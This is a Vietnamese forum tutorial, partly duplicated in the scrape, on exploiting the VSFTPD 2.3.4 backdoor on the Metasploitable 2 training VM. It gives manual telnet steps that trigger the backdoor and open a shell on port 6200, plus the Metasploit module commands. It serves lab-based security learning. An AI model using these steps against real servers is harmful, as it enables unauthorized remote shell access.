NgMSon
Well-Known Member
-
22/03/2017
-
748
-
669 bài viết
Hướng dẫn khai thác VSFTPD v2.3.4 trên Metasploitable 2
Để khai thác VSFTPD chúng ta có 2 cách như sau:
Ở đây chúng ta sẽ khai thác lỗ hổng backdoor theo cách thủ công bằng cách kết nối với dịch vụ VSFTPD Metasploitable 2 và sử dụng một hình ảnh cười như tên người dùng để xác thực.
Sử dụng lệnh :
( Trong đó Metasploit IP : IP / 21 : port - giữ nguyên )
Sau khi nhập xong chúng ta tiếp tục với 2 câu lệnh
* Chờ vài giây
Khi chúng ta kích hoạt nmap và quét cổng 6200, chúng ta sẽ thấy mã độc hại đã được thực hiện
Tiếp đó chúng ta kết nối với cổng 6200 bằng cách sử dụng lệnh sau:
Video hướng dẫn.
II. Khai thác trên Metasploit
Đâu tiên chúng ta mở msfconsole bằng lệnh sau:
Khi msfconsole đang chạy chọn khai thác backdoor bằng cách sử dụng lệnh sau:
Gõ lệnh sau để xem tùy chọn khai thác....
Như vậy chúng ta có thể thấy chúng ta chỉ cần cung cấp một IP host từ xa và một cổng mà chúng ta để mặc định trên cổng 21. Bây giờ chúng ta có thể gõ chạy hoặc khai thác để khai thác các mục tiêu.
Video demo
- Khai thác bằng tay
- Khai thác trên Metasloit
Ở đây chúng ta sẽ khai thác lỗ hổng backdoor theo cách thủ công bằng cách kết nối với dịch vụ VSFTPD Metasploitable 2 và sử dụng một hình ảnh cười như tên người dùng để xác thực.
Sử dụng lệnh :
Mã:
telnet [Metasploitable IP] 21
( Trong đó Metasploit IP : IP / 21 : port - giữ nguyên )
Sau khi nhập xong chúng ta tiếp tục với 2 câu lệnh
Mã:
USER user
Mã:
PASS pass
* Chờ vài giây
Khi chúng ta kích hoạt nmap và quét cổng 6200, chúng ta sẽ thấy mã độc hại đã được thực hiện
Mã:
telnet [Metasploitable IP] 6200
Video hướng dẫn.
II. Khai thác trên Metasploit
Đâu tiên chúng ta mở msfconsole bằng lệnh sau:
Mã:
Msfconsole
Khi msfconsole đang chạy chọn khai thác backdoor bằng cách sử dụng lệnh sau:
Mã:
use exploit/unix/ftp/vsftpd_234_backdoor
Gõ lệnh sau để xem tùy chọn khai thác....
Mã:
Show options
Như vậy chúng ta có thể thấy chúng ta chỉ cần cung cấp một IP host từ xa và một cổng mà chúng ta để mặc định trên cổng 21. Bây giờ chúng ta có thể gõ chạy hoặc khai thác để khai thác các mục tiêu.
Chỉnh sửa lần cuối bởi người điều hành: